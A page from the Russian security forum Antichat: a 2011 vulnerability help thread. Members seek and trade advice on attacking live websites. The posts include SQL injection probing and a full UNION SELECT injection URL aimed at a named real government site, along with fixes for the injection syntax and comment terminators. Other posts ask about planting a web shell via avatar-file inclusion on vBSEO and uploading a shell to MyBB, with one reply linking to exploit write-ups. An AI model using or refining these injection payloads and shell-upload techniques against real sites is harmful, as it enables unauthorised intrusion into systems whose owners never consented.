HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1681 из 2438 « Первая < 6811181158116311671 1677 1678 1679 1680 1681 1682 1683 1684 1685 1691173117812181 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16801  
Старый 14.04.2011, 22:54
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию
vbseo lfi. если в аватарку дописать шелл, и проинклюдить подключает как картинку. ava%00.php пишит ошибку, точнее не срабатывает нулл байт, пробывал заменить слешами тоже самое. Выше директории форума не выйти. Какие есть варианты.?*
 
Ответить с цитированием

  #16802  
Старый 15.04.2011, 12:19
satana8920
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
Вот такая ситуация скуля в пост запросе делаю так

select state from zip where zipcode = '23243'+ORDER+BY+1;--+';

ошибка

select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';

тоже ошибка

Пробую без кавычек

+ORDER+BY+10000;--+

без ошибок выполняет не ответа ни привета, че делать?

желательно в пм , помогите уважаемые форумчане
 
Ответить с цитированием

  #16803  
Старый 15.04.2011, 13:59
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию
Цитата:
Сообщение от satana8920  
satana8920 said:
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане
пробуй не плюс, а пробел
 
Ответить с цитированием

  #16804  
Старый 15.04.2011, 16:51
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от satana8920  
satana8920 said:
Вот такая ситуация скуля в пост запросе делаю так
select state from zip where zipcode = '23243'+ORDER+BY+1;--+';
ошибка
select state from zip where zipcode = '23243'+ORDER+BY+1000;--+';
тоже ошибка
Пробую без кавычек
+ORDER+BY+10000;--+
без ошибок выполняет не ответа ни привета, че делать?
желательно в пм , помогите уважаемые форумчане
В пост запросах нужно использовать пробел вместо знака плюс(+), т.к. знак плюс(+) именно в гет запросах обозначает пробел, т.е. запрос нужно отправить такой:

Код:
Code:
select state from zip where zipcode = '23243' ORDER BY 1000#
или же:

Код:
Code:
select state from zip where zipcode = '23243' ORDER BY 1000 AND '1'='1
 
Ответить с цитированием

  #16805  
Старый 15.04.2011, 19:04
hide
Guest
Сообщений: n/a
Провел на форуме:
16383

Репутация: 0
По умолчанию
помогите раскрутить

Код:
Code:
http://www.maine.gov/tools/whatsnew/index.php?topic=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
 
Ответить с цитированием

  #16806  
Старый 15.04.2011, 19:37
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
 
Ответить с цитированием

  #16807  
Старый 15.04.2011, 20:02
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Цитата:
Сообщение от Redwood  
Redwood said:
Домашнее задание на выходные для всех кулхацкеров из этого треда и вообще раздела уязвимости: открыть документацию по MySQL и прочитать про виды комментариев. Невозможно уже на это смотреть.
А что там читать?

/* - полный

-- - строчный

# - строчный
 
Ответить с цитированием

  #16808  
Старый 16.04.2011, 01:56
cipa21
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852

Репутация: 0
По умолчанию
Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.
 
Ответить с цитированием

  #16809  
Старый 16.04.2011, 02:57
vasykas
Guest
Сообщений: n/a
Провел на форуме:
173402

Репутация: 37
По умолчанию
mybb

Цитата:
Сообщение от cipa21  
cipa21 said:
Кто заливал шелл на MyBB 1.2.10 (имею права админа), поделитесь информацией плз.
/thread27777.html

http://www.securitylab.ru/vulnerability/379819.php

http://forum.xakepok.org/showthread.php?t=388

http://securityvulns.ru/docs26044.html

/showthread.php?t=149667
 
Ответить с цитированием

  #16810  
Старый 21.04.2011, 11:10
ta-kyn
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381

Репутация: 16
По умолчанию
C завидной регулярностью попадаю на такую штуку. Не получается подобрать кол-во полей. Что не так?

Пример, вот. Ошибка не пропадает, хоть убейся.

http://www.oaontc.ru/node/243?SysNum=137159
 
Ответить с цитированием
Ответ
Страница 1681 из 2438 « Первая < 6811181158116311671 1677 1678 1679 1680 1681 1682 1683 1684 1685 1691173117812181 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ